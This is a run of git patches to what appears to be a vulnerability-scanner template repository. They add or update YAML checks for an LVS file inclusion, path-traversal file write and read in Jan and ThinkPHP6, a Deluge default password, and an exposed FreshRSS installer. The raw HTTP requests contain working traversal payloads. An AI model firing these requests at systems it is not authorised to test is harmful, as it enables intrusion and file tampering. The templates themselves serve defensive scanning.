name: LVS DownLoad.aspx - LFI + name: LVS DownLoad.aspx - Local File Inclusion (LFI) author: pussycat0x severity: high description: | @@ -10,6 +10,7 @@ info: - https://github.com/wy876/POC/blob/main/LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FDownLoad.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md#lvs%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownloadaspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E metadata: verified: true + max-request: 1 fofa-query: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx" tags: lvs,lfi From bdd61a863b9060443b139150b9ce0a5d58f053e3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 10:00:25 +0000 Subject: [PATCH 1409/1841] Auto Template Signing [Thu Jul 18 10:00:25 UTC 2024] :robot: --- http/cves/2023/CVE-2023-43662.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-43662.yaml b/http/cves/2023/CVE-2023-43662.yaml index 7af76b3646..12c5dc0c1c 100644 --- a/http/cves/2023/CVE-2023-43662.yaml +++ b/http/cves/2023/CVE-2023-43662.yaml @@ -51,3 +51,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022045de6b917c1e02cc6fcd48f61d8b95b2ea5eeaaca8e9c4f21afcda0ecbe6f2c40220512a639c139e68d696a3e1a802809235dc1018227dba6ad95d39e07fa459417e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f096a25245693ed14c84ccb3733bd2538fc04b0c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 15:31:41 +0530 Subject: [PATCH 1410/1841] content-type header addition --- http/vulnerabilities/other/lvs-download-lfi.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/vulnerabilities/other/lvs-download-lfi.yaml b/http/vulnerabilities/other/lvs-download-lfi.yaml index df6166de40..9dfd620115 100644 --- a/http/vulnerabilities/other/lvs-download-lfi.yaml +++ b/http/vulnerabilities/other/lvs-download-lfi.yaml @@ -29,6 +29,11 @@ http: - '<add key="SqlConnString"' condition: and + - type: word + part: content_type + words: + - 'application/ms-excel' + - type: status status: - 200 From 76a1301c29b3d87cadf441f2d68ffb11da6e3946 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 15:32:08 +0530 Subject: [PATCH 1411/1841] Rename CNVD-2023-72138 to CNVD-2023-72138.yaml --- http/cnvd/2023/{CNVD-2023-72138 => CNVD-2023-72138.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cnvd/2023/{CNVD-2023-72138 => CNVD-2023-72138.yaml} (100%) diff --git a/http/cnvd/2023/CNVD-2023-72138 b/http/cnvd/2023/CNVD-2023-72138.yaml similarity index 100% rename from http/cnvd/2023/CNVD-2023-72138 rename to http/cnvd/2023/CNVD-2023-72138.yaml From 15acad48d0c4d6933081b3baba6ce0840e180653 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 18 Jul 2024 10:04:46 +0000 Subject: [PATCH 1412/1841] Auto Generated New Template Addition List [Thu Jul 18 10:04:46 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f96d222f85..1c1ddfc29b 100644 --- a/.new-additions +++ b/.new-additions @@ -31,5 +31,6 @@ http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +http/vulnerabilities/other/lvs-download-lfi.yaml network/cves/2024/CVE-2024-6746.yaml workflows/nacos-workflow.yaml From 5730f93c6ab7df7c8765e8b1382a35038f53e967 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 10:04:51 +0000 Subject: [PATCH 1413/1841] Auto Generated Templates Checksum [Thu Jul 18 10:04:51 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c419355510..f1e0abbeff 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3289,7 +3289,7 @@ http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 http/cves/2023/CVE-2023-43472.yaml:02352f22f7347c7ca98b3eb51d6851fcba2f0b40 -http/cves/2023/CVE-2023-43662.yaml:09016165373d1c055455d6f734d411cdc2ef7e3a +http/cves/2023/CVE-2023-43662.yaml:fd8ea5fc98bf1d082d261d891cfb5566fb78e6ff http/cves/2023/CVE-2023-43795.yaml:36d3e9de4b3f54d3976afca31c54f6bf5f288b53 http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a @@ -8135,6 +8135,7 @@ http/vulnerabilities/other/lotuscms-rce.yaml:c5023b88d3d12f33b30f820f815bccadab6 http/vulnerabilities/other/lucee-unset-credentials.yaml:61d85c8891d6c199773de53136c7cf28f2a4e47d http/vulnerabilities/other/lucee-xss.yaml:bf46b7df537d0e96295794584ba9be72f6bc5144 http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml:b95bcc59492b2b8444b4a3acc1fe6786f3c3fbc7 +http/vulnerabilities/other/lvs-download-lfi.yaml:649fe45a07e2edc058b13d3d42b93ee4f39940fb http/vulnerabilities/other/magicflow-lfi.yaml:b78ea8ecabdd5ce6e9e8c5de70b276909c951d24 http/vulnerabilities/other/maltrail-rce.yaml:ec63eac2269dd99e0f9ea4266a700b918834a1e5 http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml:7587c7353b2b5e3fc52eacd0fa8c26c91dca897b @@ -8898,7 +8899,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:18230a4439957a3847f46d105206e0c4bce0002f +templates-checksum.txt:c7bf813fd1d2f310cc43d4c5b6880e587a23ed3b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From eb1cf7ee29a3b1435f1de552529dd3c2c8c7a19b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 18 Jul 2024 10:05:36 +0000 Subject: [PATCH 1414/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 27084dddd6..8341ae4680 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -36,6 +36,7 @@ on: - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' + - 'http/vulnerabilities/other/lvs-download-lfi.yaml' - 'network/cves/2024/CVE-2024-6746.yaml' - 'workflows/nacos-workflow.yaml' workflow_dispatch: From ae192667b0e320ffb71a542563220897899eeaae Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 10:06:38 +0000 Subject: [PATCH 1415/1841] Auto Template Signing [Thu Jul 18 10:06:38 UTC 2024] :robot: --- http/vulnerabilities/other/lvs-download-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/lvs-download-lfi.yaml b/http/vulnerabilities/other/lvs-download-lfi.yaml index 9dfd620115..48264a0ecb 100644 --- a/http/vulnerabilities/other/lvs-download-lfi.yaml +++ b/http/vulnerabilities/other/lvs-download-lfi.yaml @@ -37,3 +37,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502207ddbe287d182587f0436cd98cb06c90a79c6c67c42c66c694f93c40e4f8dda47022100ce2778e53102dd1b36a102752e33d5641fc45219936cc951ed94ae4950fb83a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9792cc7e0e5d2e90c83eb35b47d7b7d70a5a6953 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 15:37:03 +0530 Subject: [PATCH 1416/1841] Update and rename jan-api-lfi.yaml to jan-file-upload.yaml --- .../{jan-api-lfi.yaml => jan-file-upload.yaml} | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) rename http/vulnerabilities/other/{jan-api-lfi.yaml => jan-file-upload.yaml} (72%) diff --git a/http/vulnerabilities/other/jan-api-lfi.yaml b/http/vulnerabilities/other/jan-file-upload.yaml similarity index 72% rename from http/vulnerabilities/other/jan-api-lfi.yaml rename to http/vulnerabilities/other/jan-file-upload.yaml index cc3b806c86..9f82cb2e4f 100644 --- a/http/vulnerabilities/other/jan-api-lfi.yaml +++ b/http/vulnerabilities/other/jan-file-upload.yaml @@ -1,7 +1,7 @@ -id: jan-api-lfi +id: jan-file-upload info: - name: Jan's API interface writeFileSync & appendFileSync - Arbitrary File Upload + name: Jan - Arbitrary File Upload author: pussycat0x severity: high description: | @@ -12,38 +12,38 @@ info: metadata: fofa-query: icon_hash="-165268926" max-request: 2 - tags: jan,lfi + tags: jan,intrusive,file-upload + variables: + string: "{{to_lower(rand_base(5))}}" http: - raw: - | POST /v1/app/appendFileSync HTTP/1.1 Host: {{Hostname}} - Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 - Accept-Encoding: gzip, deflate, br Referer: {{RootURL}} contentType: application/json Origin: {{RootURL}} - ["/../../../../../tmp/{{randstr}}.txt","{{randstr}}"] + ["/../../../../../tmp/{{string}}.txt","{{randstr}}"] + - | POST /v1/app/readFileSync HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate, br Referer: {{RootURL}} contentType: application/json Content-Type: text/plain;charset=UTF-8 Origin: {{RootURL}} - ["file:/../../../../../tmp/{{randstr}}.txt","utf-8"] + ["file:/../../../../../tmp/{{string}}.txt","utf-8"] matchers-condition: and matchers: - type: word part: body_2 words: - - '{{randstr}}' + - '{{string}}' - type: status status: From 02337a8b89cca59ecc4410ea7f9e69a716c8b4e9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 16:05:40 +0530 Subject: [PATCH 1417/1841] Create deluge-default-login.yaml --- .../deluge/deluge-default-login.yaml | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 http/default-logins/deluge/deluge-default-login.yaml diff --git a/http/default-logins/deluge/deluge-default-login.yaml b/http/default-logins/deluge/deluge-default-login.yaml new file mode 100644 index 0000000000..e4c7a1191d --- /dev/null +++ b/http/default-logins/deluge/deluge-default-login.yaml @@ -0,0 +1,48 @@ +id: deluge-default-login + +info: + name: Deluge - Default Login + author: ritikchaddha + severity: high + description: Deluge Default login credentials were discovered. + reference: + - https://docs.linuxserver.io/images/docker-deluge/#:~:text=The%20admin%20interface%20is%20available,%2D%3EInterface%2D%3EPassword. + metadata: + max-request: 1 + verified: true + shodan-query: title:"Deluge" + tags: deluge,misconfig,default-login + +http: + - raw: + - | + POST /json HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"method":"auth.login","params":["{{password}}"],"id":51} + + payloads: + password: + - deluge + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'result": true' + - 'error": null' + - 'id": 51' + condition: and + + - type: word + part: header + words: + - "_session_id=" + - "application/json" + condition: and + + - type: status + status: + - 200 From 4c50fe856fbc171182747eb1fafc9e72e485b3ec Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 16:09:18 +0530 Subject: [PATCH 1418/1841] lint fix --- http/default-logins/deluge/deluge-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/deluge/deluge-default-login.yaml b/http/default-logins/deluge/deluge-default-login.yaml index e4c7a1191d..e66795de0a 100644 --- a/http/default-logins/deluge/deluge-default-login.yaml +++ b/http/default-logins/deluge/deluge-default-login.yaml @@ -4,7 +4,7 @@ info: name: Deluge - Default Login author: ritikchaddha severity: high - description: Deluge Default login credentials were discovered. + description: Deluge Default login credentials were discovered. reference: - https://docs.linuxserver.io/images/docker-deluge/#:~:text=The%20admin%20interface%20is%20available,%2D%3EInterface%2D%3EPassword. metadata: From 5a0b65615c06d1723d7176d0b438f98e08aa2533 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 18 Jul 2024 16:10:01 +0530 Subject: [PATCH 1419/1841] matchers - update --- .../thinkphp/thinkphp6-arbitrary-write.yaml | 29 +++++++++++-------- 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml b/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml index 78b2f3ecda..7ea003cefc 100644 --- a/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml +++ b/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml @@ -8,27 +8,32 @@ info: reference: | - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591 - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write + - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml metadata: - verified: true shodan-query: title:"ThinkPHP" tags: thinkphp,file-upload,rce variables: random_filename: "{{to_lower(rand_base(11))}}" -requests: - - method: GET - path: - - "{{BaseURL}}/" - headers: - Cookie: "PHPSESSID=/../../../public/{{random_filename}}.php" - Content-Type: application/x-www-form-urlencoded +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID=/../../../public/{{random_filename}}.php + Content-Type: application/x-www-form-urlencoded + - | + GET /{{random_filename}}.php + Host: {{Hostname}} + matchers-condition: and matchers: - type: word - part: header + part: header_1 words: - "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php" - - type: status - status: - - 200 + + - type: dsl + dsl: + - "status_2 == 200" From c1d9599727e49e777c9324ac1e4b381a338ea576 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 16:37:01 +0530 Subject: [PATCH 1420/1841] Update deluge-webui-panel.yaml --- http/exposed-panels/deluge-webui-panel.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index d4bbb82319..bff080fa3d 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -43,4 +43,12 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8a1d367725f5e2ff200bd8a3fa5bba10fc9f59bc7355927e8fdc45086681981022100ffa17d8e88c086dd7643fbd295adf615b01a660df126c99e7fdefbe2c83127a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - "version: '([0-9.]+)'," + +# digest: 4b0a00483046022100d8a1d367725f5e2ff200bd8a3fa5bba10fc9f59bc7355927e8fdc45086681981022100ffa17d8e88c086dd7643fbd295adf615b01a660df126c99e7fdefbe2c83127a2:922c64590222798bb761d5b6d8e72950 From c8072760f4b387fc23d4d25f43026bdf9c6a44f7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 18:04:32 +0530 Subject: [PATCH 1421/1841] Create freshrss-installer.yaml --- .../installer/freshrss-installer.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/installer/freshrss-installer.yaml diff --git a/http/misconfiguration/installer/freshrss-installer.yaml b/http/misconfiguration/installer/freshrss-installer.yaml new file mode 100644 index 0000000000..33857e7dae --- /dev/null +++ b/http/misconfiguration/installer/freshrss-installer.yaml @@ -0,0 +1,32 @@ +id: freshrss-installer + +info: + name: FreshRSS - Installation + author: ritikchaddha + severity: high + description: | + FreshRSS Installation panel has been exposed. + metadata: + max-request: 1 + verified: true + fofa-query: title="Installation · FreshRSS" + tags: freshrss,misconfig,install + +http: + - method: GET + path: + - "{{BaseURL}}/i/?rid=66990a7fde984" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Installation · FreshRSS' + + - type: status + status: + - 200 From 25c7dd615ff1e69ee45bd89cac1e7595a171bef0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 13:47:38 +0000 Subject: [PATCH 1423/1841] Auto Generated Templates Checksum [Thu Jul 18 13:47:38 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f1e0abbeff..031f0dcbd0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3964,7 +3964,7 @@ http/exposed-panels/dell-idrac.yaml:20722a449528dd9eb5ff62bac2fe68c9d062ae84 http/exposed-panels/dell-openmanager-login.yaml:885fcaa0eec9169b34673270b8b2b95d2ba1b03b http/exposed-panels/dell-wyse-login.yaml:cf7eb2f7e89c30f8f731927225292f17464001f8 http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 -http/exposed-panels/deluge-webui-panel.yaml:c96ecc227eb8e9ee6ce92d640f4f13d615efbafb +http/exposed-panels/deluge-webui-panel.yaml:473ace03d33152c02cb3c10c75915025a813b945 http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 http/exposed-panels/dialogic-xms-console.yaml:7865c2e2729231058008c1a9fac7794f3f37b2c9 http/exposed-panels/digital-watchdog-panel.yaml:ee2414d7e176c9862439161eea88f8d9c99bdee2 @@ -8135,7 +8135,7 @@ http/vulnerabilities/other/lotuscms-rce.yaml:c5023b88d3d12f33b30f820f815bccadab6 http/vulnerabilities/other/lucee-unset-credentials.yaml:61d85c8891d6c199773de53136c7cf28f2a4e47d http/vulnerabilities/other/lucee-xss.yaml:bf46b7df537d0e96295794584ba9be72f6bc5144 http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml:b95bcc59492b2b8444b4a3acc1fe6786f3c3fbc7 -http/vulnerabilities/other/lvs-download-lfi.yaml:649fe45a07e2edc058b13d3d42b93ee4f39940fb +http/vulnerabilities/other/lvs-download-lfi.yaml:4eec1b31f6b314f93da884e8eac0d47ebca72bca http/vulnerabilities/other/magicflow-lfi.yaml:b78ea8ecabdd5ce6e9e8c5de70b276909c951d24 http/vulnerabilities/other/maltrail-rce.yaml:ec63eac2269dd99e0f9ea4266a700b918834a1e5 http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml:7587c7353b2b5e3fc52eacd0fa8c26c91dca897b @@ -8899,7 +8899,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c7bf813fd1d2f310cc43d4c5b6880e587a23ed3b +templates-checksum.txt:515d8361b02db290ae829423e199fa29473e1b29 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5ccbe04764590358e8522925be36dca538eb4b8c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 19:18:58 +0530 Subject: [PATCH 1424/1841] minorupdate --- http/default-logins/deluge/deluge-default-login.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/default-logins/deluge/deluge-default-login.yaml b/http/default-logins/deluge/deluge-default-login.yaml index e66795de0a..c5aeb2070d 100644 --- a/http/default-logins/deluge/deluge-default-login.yaml +++ b/http/default-logins/deluge/deluge-default-login.yaml @@ -4,14 +4,15 @@ info: name: Deluge - Default Login author: ritikchaddha severity: high - description: Deluge Default login credentials were discovered. + description: | + Deluge Default login credentials were discovered. reference: - https://docs.linuxserver.io/images/docker-deluge/#:~:text=The%20admin%20interface%20is%20available,%2D%3EInterface%2D%3EPassword. metadata: max-request: 1 verified: true shodan-query: title:"Deluge" - tags: deluge,misconfig,default-login + tags: deluge,default-login http: - raw: From 4960a53dd64afb7fc972a62b16fb00d9c9822728 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 13:49:28 +0000 Subject: [PATCH 1425/1841] Auto Template Signing [Thu Jul 18 13:49:28 UTC 2024] :robot: --- http/exposed-panels/deluge-webui-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index bff080fa3d..4006c53d67 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -50,5 +50,4 @@ http: group: 1 regex: - "version: '([0-9.]+)'," - -# digest: 4b0a00483046022100d8a1d367725f5e2ff200bd8a3fa5bba10fc9f59bc7355927e8fdc45086681981022100ffa17d8e88c086dd7643fbd295adf615b01a660df126c99e7fdefbe2c83127a2:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220292557376c9741de10fc6e8ec9153b975ac6a2868996fb6cd247ce34db312ec502205645e7dc904f88d6a594ca0c92834dbca7e48950a333328f5d17b15da84a6e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1f1daa2dd57eacfde07a59ead697e5cf2f158dca Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 19:21:08 +0530 Subject: [PATCH 1426/1841] minor update --- http/misconfiguration/installer/freshrss-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/freshrss-installer.yaml b/http/misconfiguration/installer/freshrss-installer.yaml index 33857e7dae..3c859f581b 100644 --- a/http/misconfiguration/installer/freshrss-installer.yaml +++ b/http/misconfiguration/installer/freshrss-installer.yaml @@ -15,7 +15,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/i/?rid=66990a7fde984" + - "{{BaseURL}}/i/?rid" host-redirects: true max-redirects: 2 From 6863b0db012b8d1d6aff414e80c23620622ea0cc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 13:52:46 +0000 Subject: [PATCH 1427/1841] Auto Generated Templates Checksum [Thu Jul 18 13:52:46 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 031f0dcbd0..adbd1ad658 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3565,6 +3565,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 +http/default-logins/deluge/deluge-default-login.yaml:f8ed90dba1143cfdd3b1bd666ffe85243fc9a8b1 http/default-logins/dialogic/dialogic-xms-default-login.yaml:4f64a4ef93735304917e46ae85e4689a3fde7c5b http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:757e37421ad654500aeb166c26016e839e77f176 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada @@ -3964,7 +3965,7 @@ http/exposed-panels/dell-idrac.yaml:20722a449528dd9eb5ff62bac2fe68c9d062ae84 http/exposed-panels/dell-openmanager-login.yaml:885fcaa0eec9169b34673270b8b2b95d2ba1b03b http/exposed-panels/dell-wyse-login.yaml:cf7eb2f7e89c30f8f731927225292f17464001f8 http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 -http/exposed-panels/deluge-webui-panel.yaml:473ace03d33152c02cb3c10c75915025a813b945 +http/exposed-panels/deluge-webui-panel.yaml:510e32598fdfc991fd51e71e4e3379ec0a26e8ae http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 http/exposed-panels/dialogic-xms-console.yaml:7865c2e2729231058008c1a9fac7794f3f37b2c9 http/exposed-panels/digital-watchdog-panel.yaml:ee2414d7e176c9862439161eea88f8d9c99bdee2 @@ -8899,7 +8900,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:515d8361b02db290ae829423e199fa29473e1b29 +templates-checksum.txt:e791ef0303f7c7941f102a9757345b6608e027c0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2cece6ac2c17462aed41150137fc1cf254e5a5af Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 13:54:27 +0000 Subject: [PATCH 1428/1841] Auto Template Signing [Thu Jul 18 13:54:27 UTC 2024] :robot: --- http/default-logins/deluge/deluge-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/deluge/deluge-default-login.yaml b/http/default-logins/deluge/deluge-default-login.yaml index c5aeb2070d..b9c1e20706 100644 --- a/http/default-logins/deluge/deluge-default-login.yaml +++ b/http/default-logins/deluge/deluge-default-login.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402206aff89ace5e2f8525008ef037e76ab35c5134aa5d8c6924f2d164f7c52a7dd62022025161034e47560fbd333a679c950bd5301cc8d22db66a47167e7f24263e7abff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 082059a9093c73d4198eb378b9f443d6d298ef6f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 13:54:55 +0000 Subject: [PATCH 1429/1841] Auto Generated Templates Checksum [Thu Jul 18 13:54:55 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index adbd1ad658..60deb2c303 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5682,6 +5682,7 @@ http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892 http/misconfiguration/installer/flarum-installer.yaml:b7ee710c481aa3675092568601ea31b522313b39 http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a +http/misconfiguration/installer/freshrss-installer.yaml:8d16de98765691d9b1a48524ad583e20fd904f45 http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -8900,7 +8901,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 